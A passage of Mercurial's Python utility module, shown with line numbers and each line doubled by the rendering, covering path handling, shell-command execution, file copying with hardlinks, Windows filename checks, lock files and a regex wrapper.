1013 min = nmin
1013 min = nmin
1014 if min > max:
1014 if min > max:
1015 min = max
1015 min = max
1016 yield ''.join(buf)
1016 yield ''.join(buf)
1017 blen = 0
1017 blen = 0
1018 buf = []
1018 buf = []
1019 if buf:
1019 if buf:
1020 yield ''.join(buf)
1020 yield ''.join(buf)
1021
1021
1022 Abort = error.Abort
1022 Abort = error.Abort
1023
1023
1024 def always(fn):
1024 def always(fn):
1025 return True
1025 return True
1026
1026
1027 def never(fn):
1027 def never(fn):
1028 return False
1028 return False
1029
1029
1030 def nogc(func):
1030 def nogc(func):
1031 """disable garbage collector
1031 """disable garbage collector
1032
1032
1033 Python's garbage collector triggers a GC each time a certain number of
1033 Python's garbage collector triggers a GC each time a certain number of
1034 container objects (the number being defined by gc.get_threshold()) are
1034 container objects (the number being defined by gc.get_threshold()) are
1035 allocated even when marked not to be tracked by the collector. Tracking has
1035 allocated even when marked not to be tracked by the collector. Tracking has
1036 no effect on when GCs are triggered, only on what objects the GC looks
1036 no effect on when GCs are triggered, only on what objects the GC looks
1037 into. As a workaround, disable GC while building complex (huge)
1037 into. As a workaround, disable GC while building complex (huge)
1038 containers.
1038 containers.
1039
1039
1040 This garbage collector issue have been fixed in 2.7. But it still affect
1040 This garbage collector issue have been fixed in 2.7. But it still affect
1041 CPython's performance.
1041 CPython's performance.
1042 """
1042 """
1043 def wrapper(*args, **kwargs):
1043 def wrapper(*args, **kwargs):
1044 gcenabled = gc.isenabled()
1044 gcenabled = gc.isenabled()
1045 gc.disable()
1045 gc.disable()
1046 try:
1046 try:
1047 return func(*args, **kwargs)
1047 return func(*args, **kwargs)
1048 finally:
1048 finally:
1049 if gcenabled:
1049 if gcenabled:
1050 gc.enable()
1050 gc.enable()
1051 return wrapper
1051 return wrapper
1052
1052
1053 if pycompat.ispypy:
1053 if pycompat.ispypy:
1054 # PyPy runs slower with gc disabled
1054 # PyPy runs slower with gc disabled
1055 nogc = lambda x: x
1055 nogc = lambda x: x
1056
1056
1057 def pathto(root, n1, n2):
1057 def pathto(root, n1, n2):
1058 '''return the relative path from one place to another.
1058 '''return the relative path from one place to another.
1059 root should use os.sep to separate directories
1059 root should use os.sep to separate directories
1060 n1 should use os.sep to separate directories
1060 n1 should use os.sep to separate directories
1061 n2 should use "/" to separate directories
1061 n2 should use "/" to separate directories
1062 returns an os.sep-separated path.
1062 returns an os.sep-separated path.
1063
1063
1064 If n1 is a relative path, it's assumed it's
1064 If n1 is a relative path, it's assumed it's
1065 relative to root.
1065 relative to root.
1066 n2 should always be relative to root.
1066 n2 should always be relative to root.
1067 '''
1067 '''
1068 if not n1:
1068 if not n1:
1069 return localpath(n2)
1069 return localpath(n2)
1070 if os.path.isabs(n1):
1070 if os.path.isabs(n1):
1071 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1071 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1072 return os.path.join(root, localpath(n2))
1072 return os.path.join(root, localpath(n2))
1073 n2 = '/'.join((pconvert(root), n2))
1073 n2 = '/'.join((pconvert(root), n2))
1074 a, b = splitpath(n1), n2.split('/')
1074 a, b = splitpath(n1), n2.split('/')
1075 a.reverse()
1075 a.reverse()
1076 b.reverse()
1076 b.reverse()
1077 while a and b and a[-1] == b[-1]:
1077 while a and b and a[-1] == b[-1]:
1078 a.pop()
1078 a.pop()
1079 b.pop()
1079 b.pop()
1080 b.reverse()
1080 b.reverse()
1081 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1081 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082
1082
1083 def mainfrozen():
1083 def mainfrozen():
1084 """return True if we are a frozen executable.
1084 """return True if we are a frozen executable.
1085
1085
1086 The code supports py2exe (most common, Windows only) and tools/freeze
1086 The code supports py2exe (most common, Windows only) and tools/freeze
1087 (portable, not much used).
1087 (portable, not much used).
1088 """
1088 """
1089 return (safehasattr(sys, "frozen") or # new py2exe
1089 return (safehasattr(sys, "frozen") or # new py2exe
1090 safehasattr(sys, "importers") or # old py2exe
1090 safehasattr(sys, "importers") or # old py2exe
1091 imp.is_frozen(u"__main__")) # tools/freeze
1091 imp.is_frozen(u"__main__")) # tools/freeze
1092
1092
1093 # the location of data files matching the source code
1093 # the location of data files matching the source code
1094 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1094 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1095 # executable version (py2exe) doesn't support __file__
1095 # executable version (py2exe) doesn't support __file__
1096 datapath = os.path.dirname(pycompat.sysexecutable)
1096 datapath = os.path.dirname(pycompat.sysexecutable)
1097 else:
1097 else:
1098 datapath = os.path.dirname(pycompat.fsencode(__file__))
1098 datapath = os.path.dirname(pycompat.fsencode(__file__))
1099
1099
1100 i18n.setdatapath(datapath)
1100 i18n.setdatapath(datapath)
1101
1101
1102 _hgexecutable = None
1102 _hgexecutable = None
1103
1103
1104 def hgexecutable():
1104 def hgexecutable():
1105 """return location of the 'hg' executable.
1105 """return location of the 'hg' executable.
1106
1106
1107 Defaults to $HG or 'hg' in the search path.
1107 Defaults to $HG or 'hg' in the search path.
1108 """
1108 """
1109 if _hgexecutable is None:
1109 if _hgexecutable is None:
1110 hg = encoding.environ.get('HG')
1110 hg = encoding.environ.get('HG')
1111 mainmod = sys.modules[pycompat.sysstr('__main__')]
1111 mainmod = sys.modules[pycompat.sysstr('__main__')]
1112 if hg:
1112 if hg:
1113 _sethgexecutable(hg)
1113 _sethgexecutable(hg)
1114 elif mainfrozen():
1114 elif mainfrozen():
1115 if getattr(sys, 'frozen', None) == 'macosx_app':
1115 if getattr(sys, 'frozen', None) == 'macosx_app':
1116 # Env variable set by py2app
1116 # Env variable set by py2app
1117 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1117 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1118 else:
1118 else:
1119 _sethgexecutable(pycompat.sysexecutable)
1119 _sethgexecutable(pycompat.sysexecutable)
1120 elif (os.path.basename(
1120 elif (os.path.basename(
1121 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1121 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1122 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1122 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1123 else:
1123 else:
1124 exe = findexe('hg') or os.path.basename(sys.argv[0])
1124 exe = findexe('hg') or os.path.basename(sys.argv[0])
1125 _sethgexecutable(exe)
1125 _sethgexecutable(exe)
1126 return _hgexecutable
1126 return _hgexecutable
1127
1127
1128 def _sethgexecutable(path):
1128 def _sethgexecutable(path):
1129 """set location of the 'hg' executable"""
1129 """set location of the 'hg' executable"""
1130 global _hgexecutable
1130 global _hgexecutable
1131 _hgexecutable = path
1131 _hgexecutable = path
1132
1132
1133 def _isstdout(f):
1133 def _isstdout(f):
1134 fileno = getattr(f, 'fileno', None)
1134 fileno = getattr(f, 'fileno', None)
1135 return fileno and fileno() == sys.__stdout__.fileno()
1135 return fileno and fileno() == sys.__stdout__.fileno()
1136
1136
1137 def shellenviron(environ=None):
1137 def shellenviron(environ=None):
1138 """return environ with optional override, useful for shelling out"""
1138 """return environ with optional override, useful for shelling out"""
1139 def py2shell(val):
1139 def py2shell(val):
1140 'convert python object into string that is useful to shell'
1140 'convert python object into string that is useful to shell'
1141 if val is None or val is False:
1141 if val is None or val is False:
1142 return '0'
1142 return '0'
1143 if val is True:
1143 if val is True:
1144 return '1'
1144 return '1'
1145 return str(val)
1145 return str(val)
1146 env = dict(encoding.environ)
1146 env = dict(encoding.environ)
1147 if environ:
1147 if environ:
1148 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1148 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1149 env['HG'] = hgexecutable()
1149 env['HG'] = hgexecutable()
1150 return env
1150 return env
1151
1151
1152 def system(cmd, environ=None, cwd=None, out=None):
1152 def system(cmd, environ=None, cwd=None, out=None):
1153 '''enhanced shell command execution.
1153 '''enhanced shell command execution.
1154 run with environment maybe modified, maybe in different dir.
1154 run with environment maybe modified, maybe in different dir.
1155
1155
1156 if out is specified, it is assumed to be a file-like object that has a
1156 if out is specified, it is assumed to be a file-like object that has a
1157 write() method. stdout and stderr will be redirected to out.'''
1157 write() method. stdout and stderr will be redirected to out.'''
1158 try:
1158 try:
1159 stdout.flush()
1159 stdout.flush()
1160 except Exception:
1160 except Exception:
1161 pass
1161 pass
1162 cmd = quotecommand(cmd)
1162 cmd = quotecommand(cmd)
1163 env = shellenviron(environ)
1163 env = shellenviron(environ)
1164 if out is None or _isstdout(out):
1164 if out is None or _isstdout(out):
1165 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1165 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1166 env=env, cwd=cwd)
1166 env=env, cwd=cwd)
1167 else:
1167 else:
1168 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1168 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1169 env=env, cwd=cwd, stdout=subprocess.PIPE,
1169 env=env, cwd=cwd, stdout=subprocess.PIPE,
1170 stderr=subprocess.STDOUT)
1170 stderr=subprocess.STDOUT)
1171 for line in iter(proc.stdout.readline, ''):
1171 for line in iter(proc.stdout.readline, ''):
1172 out.write(line)
1172 out.write(line)
1173 proc.wait()
1173 proc.wait()
1174 rc = proc.returncode
1174 rc = proc.returncode
1175 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1175 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1176 rc = 0
1176 rc = 0
1177 return rc
1177 return rc
1178
1178
1179 def checksignature(func):
1179 def checksignature(func):
1180 '''wrap a function with code to check for calling errors'''
1180 '''wrap a function with code to check for calling errors'''
1181 def check(*args, **kwargs):
1181 def check(*args, **kwargs):
1182 try:
1182 try:
1183 return func(*args, **kwargs)
1183 return func(*args, **kwargs)
1184 except TypeError:
1184 except TypeError:
1185 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1185 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1186 raise error.SignatureError
1186 raise error.SignatureError
1187 raise
1187 raise
1188
1188
1189 return check
1189 return check
1190
1190
1191 # a whilelist of known filesystems where hardlink works reliably
1191 # a whilelist of known filesystems where hardlink works reliably
1192 _hardlinkfswhitelist = {
1192 _hardlinkfswhitelist = {
1193 'btrfs',
1193 'btrfs',
1194 'ext2',
1194 'ext2',
1195 'ext3',
1195 'ext3',
1196 'ext4',
1196 'ext4',
1197 'hfs',
1197 'hfs',
1198 'jfs',
1198 'jfs',
1199 'reiserfs',
1199 'reiserfs',
1200 'tmpfs',
1200 'tmpfs',
1201 'ufs',
1201 'ufs',
1202 'xfs',
1202 'xfs',
1203 'zfs',
1203 'zfs',
1204 }
1204 }
1205
1205
1206 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1206 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1207 '''copy a file, preserving mode and optionally other stat info like
1207 '''copy a file, preserving mode and optionally other stat info like
1208 atime/mtime
1208 atime/mtime
1209
1209
1210 checkambig argument is used with filestat, and is useful only if
1210 checkambig argument is used with filestat, and is useful only if
1211 destination file is guarded by any lock (e.g. repo.lock or
1211 destination file is guarded by any lock (e.g. repo.lock or
1212 repo.wlock).
1212 repo.wlock).
1213
1213
1214 copystat and checkambig should be exclusive.
1214 copystat and checkambig should be exclusive.
1215 '''
1215 '''
1216 assert not (copystat and checkambig)
1216 assert not (copystat and checkambig)
1217 oldstat = None
1217 oldstat = None
1218 if os.path.lexists(dest):
1218 if os.path.lexists(dest):
1219 if checkambig:
1219 if checkambig:
1220 oldstat = checkambig and filestat.frompath(dest)
1220 oldstat = checkambig and filestat.frompath(dest)
1221 unlink(dest)
1221 unlink(dest)
1222 if hardlink:
1222 if hardlink:
1223 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1223 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1224 # unless we are confident that dest is on a whitelisted filesystem.
1224 # unless we are confident that dest is on a whitelisted filesystem.
1225 try:
1225 try:
1226 fstype = getfstype(os.path.dirname(dest))
1226 fstype = getfstype(os.path.dirname(dest))
1227 except OSError:
1227 except OSError:
1228 fstype = None
1228 fstype = None
1229 if fstype not in _hardlinkfswhitelist:
1229 if fstype not in _hardlinkfswhitelist:
1230 hardlink = False
1230 hardlink = False
1231 if hardlink:
1231 if hardlink:
1232 try:
1232 try:
1233 oslink(src, dest)
1233 oslink(src, dest)
1234 return
1234 return
1235 except (IOError, OSError):
1235 except (IOError, OSError):
1236 pass # fall back to normal copy
1236 pass # fall back to normal copy
1237 if os.path.islink(src):
1237 if os.path.islink(src):
1238 os.symlink(os.readlink(src), dest)
1238 os.symlink(os.readlink(src), dest)
1239 # copytime is ignored for symlinks, but in general copytime isn't needed
1239 # copytime is ignored for symlinks, but in general copytime isn't needed
1240 # for them anyway
1240 # for them anyway
1241 else:
1241 else:
1242 try:
1242 try:
1243 shutil.copyfile(src, dest)
1243 shutil.copyfile(src, dest)
1244 if copystat:
1244 if copystat:
1245 # copystat also copies mode
1245 # copystat also copies mode
1246 shutil.copystat(src, dest)
1246 shutil.copystat(src, dest)
1247 else:
1247 else:
1248 shutil.copymode(src, dest)
1248 shutil.copymode(src, dest)
1249 if oldstat and oldstat.stat:
1249 if oldstat and oldstat.stat:
1250 newstat = filestat.frompath(dest)
1250 newstat = filestat.frompath(dest)
1251 if newstat.isambig(oldstat):
1251 if newstat.isambig(oldstat):
1252 # stat of copied file is ambiguous to original one
1252 # stat of copied file is ambiguous to original one
1253 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1253 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1254 os.utime(dest, (advanced, advanced))
1254 os.utime(dest, (advanced, advanced))
1255 except shutil.Error as inst:
1255 except shutil.Error as inst:
1256 raise Abort(str(inst))
1256 raise Abort(str(inst))
1257
1257
1258 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1258 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1259 """Copy a directory tree using hardlinks if possible."""
1259 """Copy a directory tree using hardlinks if possible."""
1260 num = 0
1260 num = 0
1261
1261
1262 gettopic = lambda: hardlink and _('linking') or _('copying')
1262 gettopic = lambda: hardlink and _('linking') or _('copying')
1263
1263
1264 if os.path.isdir(src):
1264 if os.path.isdir(src):
1265 if hardlink is None:
1265 if hardlink is None:
1266 hardlink = (os.stat(src).st_dev ==
1266 hardlink = (os.stat(src).st_dev ==
1267 os.stat(os.path.dirname(dst)).st_dev)
1267 os.stat(os.path.dirname(dst)).st_dev)
1268 topic = gettopic()
1268 topic = gettopic()
1269 os.mkdir(dst)
1269 os.mkdir(dst)
1270 for name, kind in listdir(src):
1270 for name, kind in listdir(src):
1271 srcname = os.path.join(src, name)
1271 srcname = os.path.join(src, name)
1272 dstname = os.path.join(dst, name)
1272 dstname = os.path.join(dst, name)
1273 def nprog(t, pos):
1273 def nprog(t, pos):
1274 if pos is not None:
1274 if pos is not None:
1275 return progress(t, pos + num)
1275 return progress(t, pos + num)
1276 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1276 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1277 num += n
1277 num += n
1278 else:
1278 else:
1279 if hardlink is None:
1279 if hardlink is None:
1280 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1280 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1281 os.stat(os.path.dirname(dst)).st_dev)
1281 os.stat(os.path.dirname(dst)).st_dev)
1282 topic = gettopic()
1282 topic = gettopic()
1283
1283
1284 if hardlink:
1284 if hardlink:
1285 try:
1285 try:
1286 oslink(src, dst)
1286 oslink(src, dst)
1287 except (IOError, OSError):
1287 except (IOError, OSError):
1288 hardlink = False
1288 hardlink = False
1289 shutil.copy(src, dst)
1289 shutil.copy(src, dst)
1290 else:
1290 else:
1291 shutil.copy(src, dst)
1291 shutil.copy(src, dst)
1292 num += 1
1292 num += 1
1293 progress(topic, num)
1293 progress(topic, num)
1294 progress(topic, None)
1294 progress(topic, None)
1295
1295
1296 return hardlink, num
1296 return hardlink, num
1297
1297
1298 _winreservednames = {
1298 _winreservednames = {
1299 'con', 'prn', 'aux', 'nul',
1299 'con', 'prn', 'aux', 'nul',
1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1302 }
1302 }
1303 _winreservedchars = ':*?"<>|'
1303 _winreservedchars = ':*?"<>|'
1304 def checkwinfilename(path):
1304 def checkwinfilename(path):
1305 r'''Check that the base-relative path is a valid filename on Windows.
1305 r'''Check that the base-relative path is a valid filename on Windows.
1306 Returns None if the path is ok, or a UI string describing the problem.
1306 Returns None if the path is ok, or a UI string describing the problem.
1307
1307
1308 >>> checkwinfilename(b"just/a/normal/path")
1308 >>> checkwinfilename(b"just/a/normal/path")
1309 >>> checkwinfilename(b"foo/bar/con.xml")
1309 >>> checkwinfilename(b"foo/bar/con.xml")
1310 "filename contains 'con', which is reserved on Windows"
1310 "filename contains 'con', which is reserved on Windows"
1311 >>> checkwinfilename(b"foo/con.xml/bar")
1311 >>> checkwinfilename(b"foo/con.xml/bar")
1312 "filename contains 'con', which is reserved on Windows"
1312 "filename contains 'con', which is reserved on Windows"
1313 >>> checkwinfilename(b"foo/bar/xml.con")
1313 >>> checkwinfilename(b"foo/bar/xml.con")
1314 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1314 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1315 "filename contains 'AUX', which is reserved on Windows"
1315 "filename contains 'AUX', which is reserved on Windows"
1316 >>> checkwinfilename(b"foo/bar/bla:.txt")
1316 >>> checkwinfilename(b"foo/bar/bla:.txt")
1317 "filename contains ':', which is reserved on Windows"
1317 "filename contains ':', which is reserved on Windows"
1318 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1318 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1319 "filename contains '\\x07', which is invalid on Windows"
1319 "filename contains '\\x07', which is invalid on Windows"
1320 >>> checkwinfilename(b"foo/bar/bla ")
1320 >>> checkwinfilename(b"foo/bar/bla ")
1321 "filename ends with ' ', which is not allowed on Windows"
1321 "filename ends with ' ', which is not allowed on Windows"
1322 >>> checkwinfilename(b"../bar")
1322 >>> checkwinfilename(b"../bar")
1323 >>> checkwinfilename(b"foo\\")
1323 >>> checkwinfilename(b"foo\\")
1324 "filename ends with '\\', which is invalid on Windows"
1324 "filename ends with '\\', which is invalid on Windows"
1325 >>> checkwinfilename(b"foo\\/bar")
1325 >>> checkwinfilename(b"foo\\/bar")
1326 "directory name ends with '\\', which is invalid on Windows"
1326 "directory name ends with '\\', which is invalid on Windows"
1327 '''
1327 '''
1328 if path.endswith('\\'):
1328 if path.endswith('\\'):
1329 return _("filename ends with '\\', which is invalid on Windows")
1329 return _("filename ends with '\\', which is invalid on Windows")
1330 if '\\/' in path:
1330 if '\\/' in path:
1331 return _("directory name ends with '\\', which is invalid on Windows")
1331 return _("directory name ends with '\\', which is invalid on Windows")
1332 for n in path.replace('\\', '/').split('/'):
1332 for n in path.replace('\\', '/').split('/'):
1333 if not n:
1333 if not n:
1334 continue
1334 continue
1335 for c in _filenamebytestr(n):
1335 for c in _filenamebytestr(n):
1336 if c in _winreservedchars:
1336 if c in _winreservedchars:
1337 return _("filename contains '%s', which is reserved "
1337 return _("filename contains '%s', which is reserved "
1338 "on Windows") % c
1338 "on Windows") % c
1339 if ord(c) <= 31:
1339 if ord(c) <= 31:
1340 return _("filename contains '%s', which is invalid "
1340 return _("filename contains '%s', which is invalid "
1341 "on Windows") % escapestr(c)
1341 "on Windows") % escapestr(c)
1342 base = n.split('.')[0]
1342 base = n.split('.')[0]
1343 if base and base.lower() in _winreservednames:
1343 if base and base.lower() in _winreservednames:
1344 return _("filename contains '%s', which is reserved "
1344 return _("filename contains '%s', which is reserved "
1345 "on Windows") % base
1345 "on Windows") % base
1346 t = n[-1:]
1346 t = n[-1:]
1347 if t in '. ' and n not in '..':
1347 if t in '. ' and n not in '..':
1348 return _("filename ends with '%s', which is not allowed "
1348 return _("filename ends with '%s', which is not allowed "
1349 "on Windows") % t
1349 "on Windows") % t
1350
1350
1351 if pycompat.iswindows:
1351 if pycompat.iswindows:
1352 checkosfilename = checkwinfilename
1352 checkosfilename = checkwinfilename
1353 timer = time.clock
1353 timer = time.clock
1354 else:
1354 else:
1355 checkosfilename = platform.checkosfilename
1355 checkosfilename = platform.checkosfilename
1356 timer = time.time
1356 timer = time.time
1357
1357
1358 if safehasattr(time, "perf_counter"):
1358 if safehasattr(time, "perf_counter"):
1359 timer = time.perf_counter
1359 timer = time.perf_counter
1360
1360
1361 def makelock(info, pathname):
1361 def makelock(info, pathname):
1362 try:
1362 try:
1363 return os.symlink(info, pathname)
1363 return os.symlink(info, pathname)
1364 except OSError as why:
1364 except OSError as why:
1365 if why.errno == errno.EEXIST:
1365 if why.errno == errno.EEXIST:
1366 raise
1366 raise
1367 except AttributeError: # no symlink in os
1367 except AttributeError: # no symlink in os
1368 pass
1368 pass
1369
1369
1370 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1370 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1371 os.write(ld, info)
1371 os.write(ld, info)
1372 os.close(ld)
1372 os.close(ld)
1373
1373
1374 def readlock(pathname):
1374 def readlock(pathname):
1375 try:
1375 try:
1376 return os.readlink(pathname)
1376 return os.readlink(pathname)
1377 except OSError as why:
1377 except OSError as why:
1378 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1378 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1379 raise
1379 raise
1380 except AttributeError: # no symlink in os
1380 except AttributeError: # no symlink in os
1381 pass
1381 pass
1382 fp = posixfile(pathname)
1382 fp = posixfile(pathname)
1383 r = fp.read()
1383 r = fp.read()
1384 fp.close()
1384 fp.close()
1385 return r
1385 return r
1386
1386
1387 def fstat(fp):
1387 def fstat(fp):
1388 '''stat file object that may not have fileno method.'''
1388 '''stat file object that may not have fileno method.'''
1389 try:
1389 try:
1390 return os.fstat(fp.fileno())
1390 return os.fstat(fp.fileno())
1391 except AttributeError:
1391 except AttributeError:
1392 return os.stat(fp.name)
1392 return os.stat(fp.name)
1393
1393
1394 # File system features
1394 # File system features
1395
1395
1396 def fscasesensitive(path):
1396 def fscasesensitive(path):
1397 """
1397 """
1398 Return true if the given path is on a case-sensitive filesystem
1398 Return true if the given path is on a case-sensitive filesystem
1399
1399
1400 Requires a path (like /foo/.hg) ending with a foldable final
1400 Requires a path (like /foo/.hg) ending with a foldable final
1401 directory component.
1401 directory component.
1402 """
1402 """
1403 s1 = os.lstat(path)
1403 s1 = os.lstat(path)
1404 d, b = os.path.split(path)
1404 d, b = os.path.split(path)
1405 b2 = b.upper()
1405 b2 = b.upper()
1406 if b == b2:
1406 if b == b2:
1407 b2 = b.lower()
1407 b2 = b.lower()
1408 if b == b2:
1408 if b == b2:
1409 return True # no evidence against case sensitivity
1409 return True # no evidence against case sensitivity
1410 p2 = os.path.join(d, b2)
1410 p2 = os.path.join(d, b2)
1411 try:
1411 try:
1412 s2 = os.lstat(p2)
1412 s2 = os.lstat(p2)
1413 if s2 == s1:
1413 if s2 == s1:
1414 return False
1414 return False
1415 return True
1415 return True
1416 except OSError:
1416 except OSError:
1417 return True
1417 return True
1418
1418
1419 try:
1419 try:
1420 import re2
1420 import re2
1421 _re2 = None
1421 _re2 = None
1422 except ImportError:
1422 except ImportError:
1423 _re2 = False
1423 _re2 = False
1424
1424
1425 class _re(object):
1425 class _re(object):
1426 def _checkre2(self):
1426 def _checkre2(self):
1427 global _re2
1427 global _re2
1428 try:
1428 try:
1429 # check if match works, see issue3964
1429 # check if match works, see issue3964
1430 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1430 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1431 except ImportError:
1431 except ImportError:
1432 _re2 = False
1432 _re2 = False
1433
1433
1434 def compile(self, pat, flags=0):
1434 def compile(self, pat, flags=0):
1435 '''Compile a regular expression, using re2 if possible
1435 '''Compile a regular expression, using re2 if possible
1436
1436
1437 For best performance, use only re2-compatible regexp features. The
1437 For best performance, use only re2-compatible regexp features. The
1438 only flags from the re module that are re2-compatible are
1438 only flags from the re module that are re2-compatible are
1439 IGNORECASE and MULTILINE.'''
1439 IGNORECASE and MULTILINE.'''
1440 if _re2 is None:
1440 if _re2 is None:
1441 self._checkre2()
1441 self._checkre2()
1442 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1442 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1443 if flags & remod.IGNORECASE:
1443 if flags & remod.IGNORECASE:
1444 pat = '(?i)' + pat
1444 pat = '(?i)' + pat
1445 if flags & remod.MULTILINE:
1445 if flags & remod.MULTILINE:
1446 pat = '(?m)' + pat
1446 pat = '(?m)' + pat
1447 try:
1447 try:
1448 return re2.compile(pat)
1448 return re2.compile(pat)
1449 except re2.error:
1449 except re2.error:
1450 pass
1450 pass
1451 return remod.compile(pat, flags)
1451 return remod.compile(pat, flags)
1452
1452
1453 @propertycache
1453 @propertycache
1454 def escape(self):
1454 def escape(self):
1455 '''Return the version of escape corresponding to self.compile.
1455 '''Return the version of escape corresponding to self.compile.
1456
1456
1457 This is imperfect because whether re2 or re is used for a particular
1457 This is imperfect because whether re2 or re is used for a particular
1458 function depends on the flags, etc, but it's the best we can do.
1458 function depends on the flags, etc, but it's the best we can do.
1459 '''
1459 '''
1460 global _re2
1460 global _re2
1461 if _re2 is None:
1461 if _re2 is None:
1462 self._checkre2()
1462 self._checkre2()
1463 if _re2:
1463 if _re2:
1464 return re2.escape
1464 return re2.escape
1465 else:
1465 else:
1466 return remod.escape
1466 return remod.escape
1467
1467
1468 re = _re()
1468 re = _re()
1469
1469
1470 _fspathcache = {}
1470 _fspathcache = {}
1471 def fspath(name, root):
1471 def fspath(name, root):
1472 '''Get name in the case stored in the filesystem
1472 '''Get name in the case stored in the filesystem
1473
1473
1474 The name should be relative to root, and be normcase-ed for efficiency.
1474 The name should be relative to root, and be normcase-ed for efficiency.
1475
1475
1476 Note that this function is unnecessary, and should not be
1476 Note that this function is unnecessary, and should not be
1477 called, for case-sensitive filesystems (simply because it's expensive).
1477 called, for case-sensitive filesystems (simply because it's expensive).
1478
1478
1479 The root should be normcase-ed, too.
1479 The root should be normcase-ed, too.
1480 '''
1480 '''
1481 def _makefspathcacheentry(dir):
1481 def _makefspathcacheentry(dir):
1482 return dict((normcase(n), n) for n in os.listdir(dir))
1482 return dict((normcase(n), n) for n in os.listdir(dir))
1483
1483
1484 seps = pycompat.ossep
1484 seps = pycompat.ossep
1485 if pycompat.osaltsep:
1485 if pycompat.osaltsep:
1486 seps = seps + pycompat.osaltsep
1486 seps = seps + pycompat.osaltsep
1487 # Protect backslashes. This gets silly very quickly.
1487 # Protect backslashes. This gets silly very quickly.
1488 seps.replace('\\','\\\\')
1488 seps.replace('\\','\\\\')
1489 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1489 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1490 dir = os.path.normpath(root)
1490 dir = os.path.normpath(root)
1491 result = []
1491 result = []
1492 for part, sep in pattern.findall(name):
1492 for part, sep in pattern.findall(name):
1493 if sep:
1493 if sep:
1494 result.append(sep)
1494 result.append(sep)
1495 continue
1495 continue
1496
1496
1497 if dir not in _fspathcache:
1497 if dir not in _fspathcache:
1498 _fspathcache[dir] = _makefspathcacheentry(dir)
1498 _fspathcache[dir] = _makefspathcacheentry(dir)
1499 contents = _fspathcache[dir]
1499 contents = _fspathcache[dir]
1500
1500
1501 found = contents.get(part)
1501 found = contents.get(part)
1502 if not found:
1502 if not found:
1503 # retry "once per directory" per "dirstate.walk" which
1503 # retry "once per directory" per "dirstate.walk" which
1504 # may take place for each patches of "hg qpush", for example
1504 # may take place for each patches of "hg qpush", for example
1505 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1505 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1506 found = contents.get(part)
1506 found = contents.get(part)
1507
1507
1508 result.append(found or part)
1508 result.append(found or part)
1509 dir = os.path.join(dir, part)
1509 dir = os.path.join(dir, part)
1510
1510
1511 return ''.join(result)
1511 return ''.join(result)
1512
1512
1513 def getfstype(dirpath):
1513 def getfstype(dirpath):
1514 '''Get the filesystem type name from a directory (best-effort)
1514 '''Get the filesystem type name from a directory (best-effort)
1515
1515
1516 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1516 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1517 '''
1517 '''
1518 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1518 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1519
1519
1520 def checknlink(testfile):
1520 def checknlink(testfile):
1521 '''check whether hardlink count reporting works properly'''
1521 '''check whether hardlink count reporting works properly'''
1522
1522
1523 # testfile may be open, so we need a separate file for checking to
1523 # testfile may be open, so we need a separate file for checking to
1524 # work around issue2543 (or testfile may get lost on Samba shares)
